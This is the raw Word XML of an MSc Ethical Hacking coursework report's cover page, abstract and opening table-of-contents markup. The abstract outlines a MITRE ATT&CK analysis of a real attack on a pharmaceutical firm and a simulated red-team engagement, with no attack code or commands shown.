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9753B2" w14:textId="78B4E204" w:rsidR="000C0349" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB">
      <w:r w:rsidRPr="00C6436E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="626D75BB" wp14:editId="5E4084F0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>895350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>95250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3928564" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="444366121" name="Picture 1" descr="About University of Wales Trinity Saint David | UWTSD &amp; Duc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out University of Wales Trinity Saint David | UWTSD &amp; Duce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28564" cy="1304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BEADF5" w14:textId="418A7B9C" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB"/>
    <w:p w14:paraId="042480B3" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB"/>
    <w:p w14:paraId="4E6B39D9" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB"/>
    <w:p w14:paraId="02970883" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB"/>
    <w:p w14:paraId="772E326C" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB"/>
    <w:p w14:paraId="0A9C4820" w14:textId="26D1A654" w:rsidR="00DB1C6E" w:rsidRPr="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6436E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MSc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6436E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cybersecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D866AD" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRPr="000C0349" w:rsidRDefault="00DB1C6E" w:rsidP="007C7CBB">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1B2BC9" w14:textId="66866FF9" w:rsidR="000C0349" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1C6E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ethical Hacking (ACCA7033)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D391CB8" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRPr="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6F68AF" w14:textId="00A5E948" w:rsidR="00DB1C6E" w:rsidRPr="00851DF0" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851DF0">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidR="00252F8F" w:rsidRPr="00252F8F">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Research into cyber security attacks and Penetration testing for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00252F8F" w:rsidRPr="00252F8F">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00252F8F" w:rsidRPr="00252F8F">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>virtualise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00252F8F" w:rsidRPr="00252F8F">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> simulated company Website</w:t>
      </w:r>
      <w:r w:rsidRPr="00851DF0">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FBB13" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D24B8F" w14:textId="4CE9C2CC" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6436E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lecturer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00252F8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Mohamed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ghanem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D88A7E3" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1596FD5B" w14:textId="5E7033F0" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Student N</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6436E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ame:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Md</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tarequr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Rahman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sharif </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D7D18" w14:textId="77777777" w:rsidR="00DB1C6E" w:rsidRPr="00C6436E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C824C1F" w14:textId="6C38C912" w:rsidR="00DB1C6E" w:rsidRDefault="00DB1C6E" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6436E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Student</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID Number: 2437470</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF28E1" w14:textId="77777777" w:rsidR="00701604" w:rsidRDefault="00701604" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3151307C" w14:textId="1281E6F2" w:rsidR="00701604" w:rsidRPr="00C6436E" w:rsidRDefault="00701604" w:rsidP="00DB1C6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:sectPr w:rsidR="00701604" w:rsidRPr="00C6436E" w:rsidSect="00DB1C6E">
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Submission Date : 17</w:t>
      </w:r>
      <w:r w:rsidR="006508B8" w:rsidRPr="006508B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="006508B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> December 2025</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="76FE8F10" w14:textId="77777777" w:rsidR="00917D2F" w:rsidRPr="00917D2F" w:rsidRDefault="00917D2F" w:rsidP="00917D2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC33E45" w14:textId="411C0EB5" w:rsidR="00917D2F" w:rsidRPr="00285046" w:rsidRDefault="00917D2F" w:rsidP="00917D2F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">This report will comprehensively </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>analyse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> the strategic offensive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> in two major parts. The first would comprise an analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic Threat on a very complex, actual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>cyberattack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a leading research </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>organisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> from within the pharmaceutical industry. Attacker TTPs are mapped to the MITRE ATT&amp;CK® Enterprise Matrix so that root cause analysis can be taken; this will allow targeted and strategic prevention and detection recommendations to be formed.</w:t>
      </w:r>
      <w:hyperlink w:anchor="First" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
            </w:rPr>
            <w:id w:val="-836306473"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION MIT25 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BA0431" w:rsidRPr="00BA0431">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> The second half of this report documents "Operation IP Shield," a Red Team Engagement undertaken against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">emulated hybrid infrastructure belonging to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>Cureton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pharmaceutical Company (CPC). It details campaign design, execution via the use of advanced Command and Control (C2) and Living-Off-the-Land (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>) techniques, and results in a professional deliverable that includes a technical report for defenders as well as an executive brief containing a cost-benefit analysis to justify future security investments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:hyperlink w:anchor="second" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
            </w:rPr>
            <w:id w:val="-113829053"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION Man23 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BA0431" w:rsidRPr="00BA0431">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA0431">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>. The purpose is to show competence not only in threat intelligence analysis but also in carrying out meaningful simulations of adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E1B00" w14:textId="77777777" w:rsidR="007C7CBB" w:rsidRDefault="007C7CBB" w:rsidP="007C7CBB">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6EE6AD" w14:textId="77777777" w:rsidR="007C7CBB" w:rsidRDefault="007C7CBB" w:rsidP="007C7CBB">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01550F47" w14:textId="3737CE9E" w:rsidR="004D534D" w:rsidRDefault="00917D2F" w:rsidP="00917D2F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="1786392916"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="72E90A8C" w14:textId="77777777" w:rsidR="00F7143D" w:rsidRPr="00F7143D" w:rsidRDefault="00F7143D" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="002060"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F7143D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:t xml:space="preserve">Table </w:t>
          </w:r>
          <w:r w:rsidR="00626221" w:rsidRPr="00F7143D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:t>of</w:t>
          </w:r>
          <w:r w:rsidRPr="00F7143D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:t xml:space="preserve"> Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="03252C36" w14:textId="5ADE0A44" w:rsidR="00917D2F" w:rsidRDefault="00F7143D" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00874A6A">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00874A6A">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
